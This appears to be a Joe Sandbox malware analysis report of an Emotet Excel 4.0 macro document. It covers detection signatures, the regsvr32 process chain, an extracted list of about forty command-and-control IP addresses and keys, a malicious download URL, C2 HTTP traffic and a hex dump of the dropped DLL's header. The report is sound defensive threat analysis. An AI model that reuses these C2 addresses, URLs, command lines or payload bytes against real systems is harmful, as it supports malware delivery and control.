Edit tour

Windows Analysis Report
DETAILS-0203.xlsm

Overview

General Information

Sample Name:	DETAILS-0203.xlsm
Analysis ID:	581705
MD5:	a631b56f4ee5aad96d39106f3c13439b
SHA1:	0ad16f468aaee7a3076776937d3d3394fc1aea12
SHA256:	1d1835e4149e0a89055436c2e98297dafa7d903da42ec5db6b8ba33bffa4f41d
Tags:	xlsm
Infos:

Detection

Hidden Macro 4.0 Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Document exploit detected (creates forbidden files)

Antivirus detection for URL or domain

Found malicious Excel 4.0 Macro

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Regsvr32 Network Activity

Found Excel 4.0 Macro with suspicious formulas

Sigma detected: Regsvr32 Command Line Without DLL

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Document exploit detected (UrlDownloadToFile)

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Stores large binary data to the registry

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Sigma detected: Excel Network Connections

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Downloads executable code via HTTP

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Yara detected Xls With Macro 4.0

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Connects to several IPs in different countries

Potential key logger detected (key state polling based)

Drops PE files to the user directory

Excel documents contains an embedded macro which executes code when the document is opened

Found large amount of non-executed APIs

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1532 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

regsvr32.exe (PID: 668 cmdline: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 1992 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Uxnbokktp\diqvt.pvx" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 1240 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Khmezosgsvwvlhvi\qkla.nko" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 2924 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ddpavzijv\enzcvbgsf.ang" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 3060 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Zjuyfwtdbmueckv\xkir.afb" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 2812 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Pgxqwqvekhwwh\rhpkutq.uip" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 1684 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Dksvywywhfyvdxey\snubtaeuhkc.jlg" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 1484 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Heesquvdnbifaezb\zihdgfvo.tnp" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 1968 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Viksf\nobrbbp.fhu" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 2280 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Mrxcvolbdndnzuh\zephifx.tqg" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 2164 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Smmsikqqg\mwljdvldbkxxxd.uuj" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 2272 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Gcoddegjb\etpu.msa" MD5: 432BE6CF7311062633459EEF6B242FB5)

regsvr32.exe (PID: 2676 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wtgbrcr\cardutuwmkmjp.heo" MD5: 432BE6CF7311062633459EEF6B242FB5)

svchost.exe (PID: 2976 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["168.119.39.118:443", "185.168.130.138:443", "168.197.250.14:80", "195.77.239.39:8080", "68.183.93.250:443", "185.184.25.78:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "61.7.231.226:443", "103.41.204.169:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "191.252.103.16:80", "93.104.209.107:8080", "194.9.172.107:8080", "66.42.57.149:443", "59.148.253.194:443", "62.171.178.147:8080", "139.196.72.155:8080", "198.199.98.78:8080", "185.148.168.15:8080", "195.154.146.35:443", "104.131.62.48:8080", "37.44.244.177:8080", "217.182.143.207:443", "54.38.242.185:443", "185.148.168.220:8080", "203.153.216.46:443", "87.106.97.83:7080", "78.46.73.125:443", "54.37.106.167:8080", "37.59.209.141:8080", "54.37.228.122:443", "61.7.231.229:443", "45.71.195.104:8080", "116.124.128.206:8080", "128.199.192.135:8080", "210.57.209.142:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
app.xml	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.715638953.00000000002B1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.982437930.0000000000770000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.776100426.0000000000251000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.762582363.0000000000180000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.727092920.0000000000210000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.755941529.00000000002B0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.776041513.0000000000200000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.762654415.0000000000321000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.741783060.0000000000241000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000010.00000002.787004594.0000000000C61000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.727483358.0000000000271000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000010.00000002.786980121.0000000000C30000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.708112308.00000000002A1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000B.00000002.749867154.00000000004A1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.982478205.00000000008D1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.740360397.00000000001B0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.721082289.0000000000180000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000B.00000002.749819742.0000000000470000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.733704392.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000E.00000002.769378943.0000000000340000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.721286442.00000000003D1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.707785239.00000000001F0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.715213011.00000000001C0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.756084497.00000000002E1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000E.00000002.769479040.0000000000371000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.733570022.0000000000620000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author
15.2.regsvr32.exe.200000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
16.2.regsvr32.exe.c60000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
16.2.regsvr32.exe.c30000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.regsvr32.exe.770000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
14.2.regsvr32.exe.340000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.regsvr32.exe.cc0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.regsvr32.exe.1c0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.regsvr32.exe.2b0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.regsvr32.exe.210000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.regsvr32.exe.180000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.regsvr32.exe.4a0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.regsvr32.exe.2b0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.regsvr32.exe.180000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.regsvr32.exe.2a0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.regsvr32.exe.1f0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.regsvr32.exe.3d0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.regsvr32.exe.320000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
16.2.regsvr32.exe.c30000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.regsvr32.exe.1c0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.regsvr32.exe.8d0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.regsvr32.exe.200000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.regsvr32.exe.270000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.regsvr32.exe.210000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.regsvr32.exe.250000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.regsvr32.exe.1f0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.regsvr32.exe.180000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
14.2.regsvr32.exe.370000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.regsvr32.exe.470000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.regsvr32.exe.620000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.regsvr32.exe.1b0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
14.2.regsvr32.exe.340000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.regsvr32.exe.240000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.regsvr32.exe.180000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.regsvr32.exe.2b0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.regsvr32.exe.1b0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.regsvr32.exe.470000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.regsvr32.exe.620000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.regsvr32.exe.770000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.regsvr32.exe.2e0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 34 entries

Sigma Signatures

System Summary

Sigma detected: Microsoft Office Product Spawning Windows Shell

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx, CommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1532, ProcessCommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx, ProcessId: 668

Sigma detected: Regsvr32 Network Activity

Source: Network Connection

Author: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 168.119.39.118, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 2676, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49169

Sigma detected: Regsvr32 Command Line Without DLL

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Uxnbokktp\diqvt.pvx", CommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Uxnbokktp\diqvt.pvx", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 668, ProcessCommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Uxnbokktp\diqvt.pvx", ProcessId: 1992

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": Data: DestinationIp: 212.64.200.154, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1532, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 1B 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1532, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 12.2.regsvr32.exe.2b0000.0.raw.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["168.119.39.118:443", "185.168.130.138:443", "168.197.250.14:80", "195.77.239.39:8080", "68.183.93.250:443", "185.184.25.78:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "61.7.231.226:443", "103.41.204.169:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "191.252.103.16:80", "93.104.209.107:8080", "194.9.172.107:8080", "66.42.57.149:443", "59.148.253.194:443", "62.171.178.147:8080", "139.196.72.155:8080", "198.199.98.78:8080", "185.148.168.15:8080", "195.154.146.35:443", "104.131.62.48:8080", "37.44.244.177:8080", "217.182.143.207:443", "54.38.242.185:443", "185.148.168.220:8080", "203.153.216.46:443", "87.106.97.83:7080", "78.46.73.125:443", "54.37.106.167:8080", "37.59.209.141:8080", "54.37.228.122:443", "61.7.231.229:443", "45.71.195.104:8080", "116.124.128.206:8080", "128.199.192.135:8080", "210.57.209.142:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Multi AV Scanner detection for submitted file

Source: DETAILS-0203.xlsm

ReversingLabs: Detection: 51%

Antivirus detection for URL or domain

Source: http://gymsportive.com/0zwe/pSiUh/

Avira URL Cloud: Label: malware

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 168.119.39.118:443 -> 192.168.2.22:49169 version: TLS 1.2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_1002992A __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,

4_2_1002992A

Software Vulnerabilities

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: uVyr9TJj[1].dll.0.dr

Jump to dropped file

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\uVyr9TJj[1].dll

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Source: global traffic

DNS query: name: gymsportive.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 212.64.200.154:80

Source: global traffic

TCP traffic: 192.168.2.22:49169 -> 168.119.39.118:443

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe

Network Connect: 168.119.39.118 187

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 168.119.39.118:443
Source: Malware configuration extractor	IPs: 185.168.130.138:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 68.183.93.250:443
Source: Malware configuration extractor	IPs: 185.184.25.78:8080
Source: Malware configuration extractor	IPs: 118.98.72.86:443
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 159.69.237.188:443
Source: Malware configuration extractor	IPs: 61.7.231.226:443
Source: Malware configuration extractor	IPs: 103.41.204.169:8080
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 190.90.233.66:443
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 93.104.209.107:8080
Source: Malware configuration extractor	IPs: 194.9.172.107:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 59.148.253.194:443
Source: Malware configuration extractor	IPs: 62.171.178.147:8080
Source: Malware configuration extractor	IPs: 139.196.72.155:8080
Source: Malware configuration extractor	IPs: 198.199.98.78:8080
Source: Malware configuration extractor	IPs: 185.148.168.15:8080
Source: Malware configuration extractor	IPs: 195.154.146.35:443
Source: Malware configuration extractor	IPs: 104.131.62.48:8080
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 217.182.143.207:443
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 185.148.168.220:8080
Source: Malware configuration extractor	IPs: 203.153.216.46:443
Source: Malware configuration extractor	IPs: 87.106.97.83:7080
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 54.37.106.167:8080
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443
Source: Malware configuration extractor	IPs: 61.7.231.229:443
Source: Malware configuration extractor	IPs: 45.71.195.104:8080
Source: Malware configuration extractor	IPs: 116.124.128.206:8080
Source: Malware configuration extractor	IPs: 128.199.192.135:8080
Source: Malware configuration extractor	IPs: 210.57.209.142:8080

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: Joe Sandbox View

JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87

Source: global traffic

HTTP traffic detected: GET /VxWevwAgWLhgwlSMISwgQGXvCMJFvhJsKwmPLMgURWy HTTP/1.1Cookie: lNoAlmMWNqxkzJO=AL4lu/QDFP/gSd6e2NBEVOKc1Goi3YlVwmueKcyR6a1HN/ziVgw+GTzP2pv++a7HcVDWG1mZHu2gisHDPZLfJxwA0O0esxmVS0e17XvSeonktSj+auGTYHLAeTw9LtYwhPCG5PNEJx0EKPU4Urz3acxICGBTVESIvLr+kijyToSmxbQLDvdd7AG/0V8ZLTdL2FO9bftPGowsaHOQ2HK3wTWVf9e0lABmsVp/z6caa5tFOieTPiaRnTourFS3vYbHKL1sCEPXx4m4dFGmHost: 168.119.39.118Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 104.131.62.48 104.131.62.48

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheContent-Type: application/x-msdownloadExpires: Wed, 02 Mar 2022 15:18:34 GMTLast-Modified: Wed, 02 Mar 2022 15:18:34 GMTServer: Set-Cookie: 621f8aca6fba5=1646234314; expires=Wed, 02-Mar-2022 15:19:34 GMT; Max-Age=60; path=/Content-Disposition: attachment; filename="uVyr9TJj.dll"Content-Transfer-Encoding: binaryX-Powered-By-Plesk: PleskWinDate: Wed, 02 Mar 2022 15:18:33 GMTContent-Length: 1028096Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 be 93 00 15 fa f2 6e 46 fa f2 6e 46 fa f2 6e 46 39 fd 31 46 f0 f2 6e 46 39 fd 33 46 ed f2 6e 46 fa f2 6f 46 da f0 6e 46 dd 34 13 46 e5 f2 6e 46 dd 34 03 46 76 f2 6e 46 dd 34 00 46 5b f2 6e 46 dd 34 14 46 fb f2 6e 46 dd 34 12 46 fb f2 6e 46 fa f2 6e 46 fb f2 6e 46 dd 34 16 46 fb f2 6e 46 52 69 63 68 fa f2 6e 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 1c 7e 1e 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 09 00 00 80 06 00 00 00 00 00 27 8e 04 00 00 10 00 00 00 70 09 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 f0 0f 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 7b 0b 00 ab 01 00 00 00 00 0c 00 f0 00 00 00 00 50 0c 00 c6 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0f 00 f4 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 77 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 e4 0c 0c 00 f4 0b 00 00 00 40 0c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 50 09 00 00 10 00 00 00 60 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4b 0d 02 00 00 70 09 00 00 10 02 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 7f 00 00 00 80 0b 00 00 40 00 00 00 80 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b3 3f 00 00 00 00 0c 00 00 40 00 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 19 03 00 00 00 40 0c 00 00 10 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 fe 02 00 00 50 0c 00 00 00 03 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 05 9f 00 00 00 50 0f 00 00 a0 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 